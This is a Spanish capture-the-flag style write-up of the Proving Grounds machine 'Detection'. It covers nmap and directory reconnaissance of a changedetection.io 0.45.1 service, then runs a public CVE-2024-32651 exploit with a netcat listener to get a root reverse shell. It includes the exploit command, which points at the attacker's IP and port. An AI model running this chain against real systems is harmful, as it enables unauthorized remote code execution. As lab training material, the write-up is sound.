> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-detection-web-changedetection-port-5000-+-vuln-rce-changedetection-rce.md).

# MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')

Realice un escaneo de puertos con NMAP.

`nmap -A --min-rate 3000 -Pn 192.168.163.97 -oN Basicscan.txt`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F9nsihKhi6czVnHSwsBUc%2F0.png?alt=media)

Puertos abiertos 22 ssh y 5000 http

Puerto 5000 http >> http-title "Change Detection" .

Use whatweb para ver las tecnologías de la web.

`whatweb` [`http://192.168.163.97:5000`](http://192.168.163.97:5000/)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FkpWPogmBf0r0L70Rr2VU%2F1.png?alt=media)

Pase a hacer un reconocimiento de la pagina web.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FDERFY3DddQaDywm4NtMo%2F2.png?alt=media)

Con feroxbuster realice una búsqueda de directorios ocultos.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FP5NRcebApfnWp5EU4erV%2F3.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FSdJq1N10CtXpWZLqGSLi%2F4.png?alt=media)

En su lado derecho puedo ver una versión de la aplicación web changedetecion > v 0.45.1

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F8ewAfb6msCoTkYOrbaPQ%2F5.png?alt=media)

Con la herramienta searchsploit encontré un exploit para esta versión.

`searchsploit 'change detection'`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FLv6uDVDYvGNpGwwTzCsB%2F6.png?alt=media)

Al verificar que tiene una vulnerabilidad RCE, busque en google otro exploit en github encontrando lo siguiente.

<https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE.git>

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F1nyXy2B9lP7RC6wlna8U%2F7.png?alt=media)

Utilice la prueba de concepto de este exploit para poder ejecutarlo. En otra terminal me puse a la escucha con netcat.

`python3 exploit.py --url` [`http://192.168.163.97:5000`](http://192.168.163.97:5000/) `--port 80 --ip 192.168.45.159`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FAqqg5kY62TxBq5eXbh6y%2F8.png?alt=media)

Una vez que ejecute el exploit logre el acceso remoto a la maquina como usuario root.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FsShhJDJ9lNzJKL6xmofS%2F9.png?alt=media)
